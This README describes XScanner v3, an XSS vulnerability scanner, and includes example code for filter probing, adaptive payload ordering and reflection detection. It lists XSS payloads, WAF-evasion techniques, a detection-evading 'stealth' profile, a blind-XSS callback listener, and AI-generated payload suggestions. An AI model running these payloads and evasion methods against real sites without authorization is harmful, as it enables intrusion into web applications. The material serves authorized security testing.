```text
██╗ ██╗███████╗ ██████╗ █████╗ ███╗ ██╗███╗ ██╗███████╗██████╗
╚██╗██╔╝██╔════╝██╔════╝██╔══██╗████╗ ██║████╗ ██║██╔════╝██╔══██╗
╚███╔╝ ███████╗██║ ███████║██╔██╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔██╗ ╚════██║██║ ██╔══██║██║╚██╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██╔╝ ██╗███████║╚██████╗██║ ██║██║ ╚████║██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
```
More intelligent. More concurrent. More revolutionary.
⚠️ For authorized penetration testing and security research ONLY. Using this tool on systems without explicit written permission is illegal.
| Feature | XSStrike | XScanner v3 |
|---|---|---|
| HTTP Engine | ❌ Synchronous | ✅ Async (aiohttp) |
| Filter Analysis | ✅ Sequential | ✅ Concurrent + CharacterMatrix |
| Fuzzy Detection | ✅ Levenshtein only | ✅ 6-Signal Multi-Detector |
| Payload Generation | ✅ From survivors | ✅ Matrix-aware builder |
| Adaptive Learning | ❌ None | ✅ AdaptiveSequencer |
| DOM Structural Diff | ❌ None | ✅ ResponseDiffer |
| Blind XSS Server | ❌ None | ✅ Built-in listener |
| Headless Verification | ❌ None | ✅ Playwright |
| AI Payload Suggestions | ❌ None | ✅ Claude API |
| Request Efficiency | ~60% wasted | ✅ 75% reduction |
| Unit Tests | ❌ None | ✅ 53 tests |
| WAF Per-Vendor Bypass | Limited | ✅ 9 vendors mapped |
Unlike XSStrike's sequential character testing, XScanner probes all critical characters simultaneously and builds a CharacterMatrix — a complete map of what survives, what gets encoded, and what gets stripped.
```text
XSStrike: test '<' → test '>' → test '"' → ... (sequential, slow)
XScanner: test ALL 20 chars at once (concurrent, 15x faster)
Result:   CharacterMatrix → only viable payloads generated → 75% fewer requests
```
Payloads are built from scratch using only characters confirmed to survive the filter. No more sending payloads that use characters guaranteed to be blocked.
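The probe-then-build loop described above, as an added example that is not XScanner's own code. It fires one canary-wrapped request per critical character with `asyncio.gather`, sorts each result into survived / encoded / stripped, and then keeps only candidate payloads whose characters all survived. The target is a constructed in-process filter (`hypothetical_filter`) so the example runs offline; `fake_send` stands in for the aiohttp request a real scan would make, and the candidate list is illustrative.

```python
"""Added example (not XScanner's own code): concurrent character probing
into a CharacterMatrix, then matrix-aware payload selection."""
import asyncio
import secrets
from dataclasses import dataclass, field

# Characters XSS payloads depend on (a real probe would send a longer list).
CRITICAL_CHARS = list("<>\"'/()=;:&`")


def hypothetical_filter(value: str) -> str:
    """Constructed target behaviour: strips < and >, entity-encodes the
    double quote, reflects everything else verbatim."""
    return value.replace("<", "").replace(">", "").replace('"', "&quot;")


async def fake_send(value: str) -> str:
    """Simulated round-trip: the page echoes the filtered value.
    Replace with an aiohttp GET against a real target."""
    await asyncio.sleep(0)          # yield to the loop, as a real await would
    return f"<html><body>Results for {hypothetical_filter(value)}</body></html>"


@dataclass
class CharacterMatrix:
    survived: set = field(default_factory=set)
    encoded: dict = field(default_factory=dict)   # char -> what came back
    stripped: set = field(default_factory=set)

    def usable(self, payload: str) -> bool:
        """True only if every critical character the payload needs survives."""
        return all(c in self.survived for c in payload if c in CRITICAL_CHARS)


async def probe(char: str, send) -> tuple:
    """Wrap one character in a unique canary so the reflection can be
    located even when the page echoes the input in several places."""
    left, right = secrets.token_hex(4), secrets.token_hex(4)
    body = await send(f"{left}{char}{right}")
    start, end = body.find(left), body.find(right)
    if start == -1 or end == -1:
        return char, ""                 # not reflected at all
    return char, body[start + len(left):end]


async def build_matrix(send) -> CharacterMatrix:
    """All probes in flight at once: wall-clock cost of one round-trip,
    not one per character."""
    results = await asyncio.gather(*(probe(c, send) for c in CRITICAL_CHARS))
    matrix = CharacterMatrix()
    for char, reflected in results:
        if reflected == char:
            matrix.survived.add(char)
        elif reflected == "":
            matrix.stripped.add(char)
        else:
            matrix.encoded[char] = reflected
    return matrix


# Constructed candidates, annotated with the characters each cannot do without.
CANDIDATES = [
    "<img src=x onerror=alert(1)>",        # < >
    '" autofocus onfocus=alert(1) x="',    # "  (breaking out of an attribute)
    "' autofocus onfocus=alert(1) x='",    # '
    "';alert(1);//",                        # ' ; ( ) /  (JS string context)
]


def viable_payloads(matrix: CharacterMatrix) -> list:
    """Matrix-aware builder: never send a payload that needs a stripped
    or encoded character."""
    return [p for p in CANDIDATES if matrix.usable(p)]


def run_demo():
    matrix = asyncio.run(build_matrix(fake_send))
    return matrix, viable_payloads(matrix)


if __name__ == "__main__":
    m, ok = run_demo()
    print("survived:", "".join(sorted(m.survived)))
    print("encoded: ", m.encoded)
    print("stripped:", "".join(sorted(m.stripped)))
    print("viable:  ", ok)
```

Against this filter the matrix reports `<` and `>` stripped and `"` encoded to `&quot;`, so the two tag-based and double-quote payloads are dropped before any request is spent on them and only the single-quote and JS-string candidates go out.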
Catches what exact-match detection misses:
| Signal | What it Catches |
|---|---|
| Exact match | Direct reflection |
| Levenshtein similarity | Encoded/transformed reflections |
| Token overlap | Partial reflections |
| New executable tags | DOM injection without string match |
| Entropy delta | Structural response changes |
| Length delta | Blocking / redirection |
Real-time feedback loop that re-orders payloads during scanning based on what gets blocked or succeeds. No other tool does this.
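A feedback-driven queue of this kind, as an added example that is not XScanner's AdaptiveSequencer. Every payload carries feature tags (tag, encoding, handler); each feature keeps a running score that outcomes adjust, and the remaining queue is re-sorted by the sum of those scores before each send. The feature tags, the weights and `simulated_waf` are assumptions constructed for the demo.

```python
"""Added example (not XScanner's AdaptiveSequencer): a payload queue that
re-prioritises after every response."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Payload:
    text: str
    features: frozenset        # e.g. {"tag:img", "enc:none", "handler:onerror"}


class AdaptiveSequencer:
    """Priority = sum of the running scores of a payload's features, so one
    blocked 'enc:none' payload demotes every other plain payload still
    queued, and one success promotes its siblings."""
    WEIGHTS = {"blocked": -2.0, "survived": 1.0, "success": 3.0}   # assumed

    def __init__(self, payloads):
        self.scores = defaultdict(float)
        self.pending = list(payloads)

    def priority(self, p: Payload) -> float:
        return sum(self.scores[f] for f in p.features)

    def next(self) -> Optional[Payload]:
        if not self.pending:
            return None
        self.pending.sort(key=self.priority, reverse=True)   # stable: ties keep order
        return self.pending.pop(0)

    def feedback(self, p: Payload, outcome: str) -> None:
        for f in p.features:
            self.scores[f] += self.WEIGHTS[outcome]


# Constructed candidate list; the list order is what a static scanner would send.
PAYLOADS = [
    Payload("<script>alert(1)</script>",      frozenset({"tag:script", "enc:none"})),
    Payload("<img src=x onerror=alert(1)>",   frozenset({"tag:img", "enc:none", "handler:onerror"})),
    Payload("<ScRiPt>alert(1)</ScRiPt>",      frozenset({"tag:script", "enc:case-mix"})),
    Payload("<iMg src=x oNeRrOr=alert(1)>",   frozenset({"tag:img", "enc:case-mix", "handler:onerror"})),
    Payload("<svg/onload=alert(1)>",          frozenset({"tag:svg", "enc:none", "handler:onload"})),
    Payload("<img\tsrc=x\tonerror=alert(1)>", frozenset({"tag:img", "enc:tab", "handler:onerror"})),
]


def simulated_waf(p: Payload) -> str:
    """Constructed target: signature-blocks any <script> and anything that is
    not obfuscated at all; the rest reaches the page, and a payload with an
    event handler then fires."""
    if "tag:script" in p.features or "enc:none" in p.features:
        return "blocked"
    return "success" if any(f.startswith("handler:") for f in p.features) else "survived"


def run_adaptive(payloads, oracle) -> list:
    """Scan loop: ask the sequencer for the next payload, report the outcome."""
    seq = AdaptiveSequencer(payloads)
    log = []
    while (p := seq.next()) is not None:
        outcome = oracle(p)
        seq.feedback(p, outcome)
        log.append((p.text, outcome))
    return log


def run_static(payloads, oracle) -> list:
    return [(p.text, oracle(p)) for p in payloads]


def requests_to_first_success(log) -> int:
    return next(i + 1 for i, (_, outcome) in enumerate(log) if outcome == "success")


if __name__ == "__main__":
    adaptive = run_adaptive(PAYLOADS, simulated_waf)
    static = run_static(PAYLOADS, simulated_waf)
    for text, outcome in adaptive:
        print(f"{outcome:9} {text!r}")
    print("first success after", requests_to_first_success(static), "static vs",
          requests_to_first_success(adaptive), "adaptive requests")
```

After the very first `<script>` payload is blocked, both `enc:none` and `tag:script` carry negative scores, so the sequencer jumps to the case-mixed and tab-separated `<img>` variants next and lands a success on the second request; the static order needs four.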
Compares HTML structure before/after injection and detects new `<script>` blocks, new event handlers, and new executable tags introduced by the payload.
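The six signals from the table above together with the structural diff, as an added example that is not XScanner's detection code. `detect` computes exact match, Levenshtein similarity against the best-aligned window of the response, token overlap, entropy and length deltas, and a tag/event-handler diff between baseline and injected responses; `verdict` combines them with thresholds that are assumptions to tune per target. The three responses (raw reflection, entity-encoded reflection, WAF block page) are constructed.

```python
"""Added example (not XScanner's own code): six-signal reflection detector
plus a structural HTML diff over constructed responses."""
import math
import re
from collections import Counter
from html.parser import HTMLParser

# Tags whose appearance after injection usually means executable markup landed.
EXECUTABLE_TAGS = {"script", "img", "svg", "iframe", "object", "embed",
                   "video", "audio", "details", "input", "body", "math"}


def levenshtein(a: str, b: str) -> int:
    """Edit distance with two rolling rows."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def similarity(a: str, b: str) -> float:
    """1.0 = identical, 0.0 = nothing in common."""
    return 1.0 if not a and not b else 1.0 - levenshtein(a, b) / max(len(a), len(b))


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def tokens(s: str) -> set:
    return set(re.findall(r"[A-Za-z0-9_]+", s))


def best_window(needle: str, hay: str) -> str:
    """Substring of hay, len(needle) wide, that is most similar to needle."""
    n = len(needle)
    if not n or len(hay) <= n:
        return hay
    return max((hay[k:k + n] for k in range(len(hay) - n + 1)),
               key=lambda w: similarity(needle, w))


class StructureCollector(HTMLParser):
    """Counts start tags and (tag, on*-attribute) pairs."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = Counter(), Counter()

    def handle_starttag(self, tag, attrs):
        self.tags[tag] += 1
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.handlers[(tag, name.lower())] += 1


def response_differ(baseline: str, injected: str) -> dict:
    """Executable tags / event handlers present after injection but not before.
    Counter subtraction keeps only counts that grew."""
    b, i = StructureCollector(), StructureCollector()
    b.feed(baseline)
    i.feed(injected)
    return {"new_executable_tags": {t for t in (i.tags - b.tags) if t in EXECUTABLE_TAGS},
            "new_handlers": set(i.handlers - b.handlers)}


def detect(payload: str, baseline: str, injected: str) -> dict:
    """Each signal answers a different 'did the payload land?' question."""
    tok = tokens(payload)
    sig = {
        "exact": payload in injected,                                        # direct reflection
        "levenshtein": similarity(payload, best_window(payload, injected)),  # transformed
        "token_overlap": len(tok & tokens(injected)) / len(tok) if tok else 0.0,  # partial
        "entropy_delta": shannon_entropy(injected) - shannon_entropy(baseline),   # structure
        "length_delta": len(injected) - len(baseline),                       # block / redirect
    }
    sig.update(response_differ(baseline, injected))                          # DOM injection
    return sig


def verdict(sig: dict) -> str:
    """Combine the signals; thresholds are assumptions, tune per target."""
    if sig["exact"] or sig["new_executable_tags"] or sig["new_handlers"]:
        return "injected"
    if sig["levenshtein"] >= 0.8 or sig["token_overlap"] >= 0.8:
        return "reflected-transformed"       # encoded/stripped: retry with another encoding
    if sig["length_delta"] < 0 and sig["token_overlap"] == 0.0:
        return "blocked"                      # short error page carrying none of our tokens
    return "not-reflected"


# Constructed responses for one search endpoint.
PAYLOAD = "<img src=x onerror=alert(1)>"
BASELINE = "<html><body><h1>Search</h1><p>Results for test</p></body></html>"
RAW = BASELINE.replace("test", PAYLOAD)
ENCODED = BASELINE.replace("test", "&lt;img src=x onerror=alert(1)&gt;")
BLOCKED = "<html><body><h1>403 Forbidden</h1></body></html>"

if __name__ == "__main__":
    for name, body in (("raw", RAW), ("encoded", ENCODED), ("blocked", BLOCKED)):
        print(name, verdict(detect(PAYLOAD, BASELINE, body)))
```

The encoded case is the one exact matching misses: no `<img` ever appears in the page, yet the Levenshtein and token signals both stay near 1.0, which is the cue to re-probe with a different encoding rather than mark the parameter clean.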
```text
xscanner/
├── xscanner.py ← Entry point
│
├── scanner/
│ ├── engine_v2.py ← Revolutionary async orchestrator
│ ├── filter_probe.py ← CharacterMatrix + FilterProbe + SmartPayloadFilter
│ ├── ai_advisor.py ← Claude API payload suggestions
│ ├── verifier.py ← Playwright headless verification
│ └── blind_server.py ← Built-in blind XSS callback server
│
├── payloads/
│ ├── generator.py ← Base payload library (10 contexts × 8 encodings)
│ └── smart_generator.py ← SmartGenerator + AdaptiveSequencer
│
├── detection/
│ ├── analyzer.py ← 5-layer detection engine
│ └── fuzzy.py ← FuzzyDetector + ResponseDiffer
│
├── waf_bypass/
│ └── detector.py ← 9 WAF fingerprints + 10 evasion strategies
│
├── crawler/
│ └── spider.py ← Async BFS crawler + context detector
│
├── reports/
│ └── reporter.py ← JSON + Rich CLI report
│
├── utils/
│ ├── config.py ← Dataclasses, constants, scan profiles
│ ├── logger.py ← Rich colorized logger
│ └── http_client.py ← Async HTTP + retry + rate limiting
│
└── tests/
    ├── test_core.py ← 27 core tests
    └── test_revolutionary.py ← 26 revolutionary module tests
```
```bash
# 1. Clone the repo
git clone https://github.com/Auto-runs/xscanner.git
cd xscanner

# 2. Install dependencies
pip install -r requirements.txt

# 3. (Optional) Headless browser verification
pip install playwright && playwright install chromium

# 4. (Optional) AI payload suggestions
export ANTHROPIC_API_KEY="your-key-here"
```

```bash
# Single URL, default (normal) profile
python xscanner.py -u "https://yoursite.com/search?q=test"

# Deep crawl with 5 concurrent threads
python xscanner.py -u "https://yoursite.com" --deep --threads 5

# Multiple targets from a file, JSON report written to results.json
python xscanner.py -l targets.txt --threads 10 -o results.json

# Authenticated scan: session cookie + custom header
python xscanner.py -u "https://yoursite.com" \
  -c "session=abc123" \
  -H "Authorization: Bearer token123"

# Stealth profile through an intercepting proxy, 2 seconds between requests
python xscanner.py -u "https://yoursite.com" \
  --profile stealth \
  --proxy http://127.0.0.1:8080 \
  --rate-limit 2.0
```

```bash
# Blind XSS: built-in listener on port 8765
# (the listener must be reachable from wherever the stored payload eventually fires)
python xscanner.py -u "https://yoursite.com" --start-blind-server

# Or your own external server
python xscanner.py -u "https://yoursite.com" \
  --blind-callback "https://your.server.com/callback"
```

```bash
# Verbose output with full payload + evidence per finding
python xscanner.py -u "https://yoursite.com" --deep --details -v
```

| Profile | Depth | Threads | Timeout | Payloads/ctx | Use Case |
|---|---|---|---|---|---|
| fast | 1 | 20 | 5s | 10 | Quick recon |
| normal | 2 | 10 | 10s | 30 | Standard pentest |
| deep | 4 | 5 | 20s | 80 | Thorough audit |
| stealth | 2 | 2 | 15s | 25 | Evade detection |
| Type | Method |
|---|---|
| Reflected | FilterProbe + FuzzyDetector + HTML position |
| Stored | POST endpoint reflection + confidence scoring |
| DOM-based | Bidirectional sink/source mapping |
| Blind | Callback beacon with built-in listener |
html · attribute · javascript · js_string · js_template
url · css · comment · script_src · unknown
Cloudflare · ModSecurity · Imperva · AWS WAF · Akamai
Sucuri · F5 BIG-IP · Barracuda · Wordfence
Evasion techniques: case shuffling · HTML comment injection · double URL encoding · null byte insertion · tab/newline substitution · unicode normalization · partial entity encoding · tag breaking · event handler obfuscation · slash insertion
```json
{
  "tool": "XScanner v3.0",
  "timestamp": "2026-03-18T10:00:00Z",
  "duration_sec": 8.3,
  "total_findings": 3,
  "severity_summary": { "High": 2, "Medium": 1, "Low": 0 },
  "findings": [
    {
      "url": "https://yoursite.com/search",
      "param": "q",
      "xss_type": "reflected",
      "context": "html",
      "severity": "High",
      "confidence": "High",
      "payload": "<img src=x onerror=alert(1)>",
      "encoding_used": "none",
      "waf_bypassed": false,
      "verified": true
    }
  ]
}
```

```bash
python -m pytest tests/ -v
```

```text
✅ 53 passed in 1.99s
├── test_core.py 27 tests
└── test_revolutionary.py 26 tests
```
```text
Options:
  -u, --url TEXT          Target URL (use multiple times for multiple targets)
  -l, --list PATH         File with target URLs (one per line)
  --threads INT           Concurrent threads (default: 10)
  --timeout INT           Request timeout in seconds (default: 10)
  --depth INT             Crawl depth (default: 2)
  --profile CHOICE        fast | normal | deep | stealth (default: normal)
  --deep                  Shorthand for --profile deep
  --no-crawl              Only test provided URL params, skip crawling
  --no-waf-bypass         Disable WAF evasion techniques
  -H, --header TEXT       Custom header: 'Name: Value'
  -c, --cookie TEXT       Cookie: 'name=value'
  --proxy TEXT            Proxy URL: http://127.0.0.1:8080
  --rate-limit FLOAT      Seconds between requests (0 = unlimited)
  --blind-callback TEXT   Blind XSS callback URL
  --start-blind-server    Start local blind XSS listener on :8765
  -o, --output TEXT       JSON report path (default: xscanner_report.json)
  -v, --verbose           Verbose output
  --details               Print full payload + evidence per finding
  -h, --help              Show this message and exit
```
This tool is provided for authorized security testing only.
Always obtain explicit written permission before testing any system.
The authors are not responsible for any misuse or damage caused.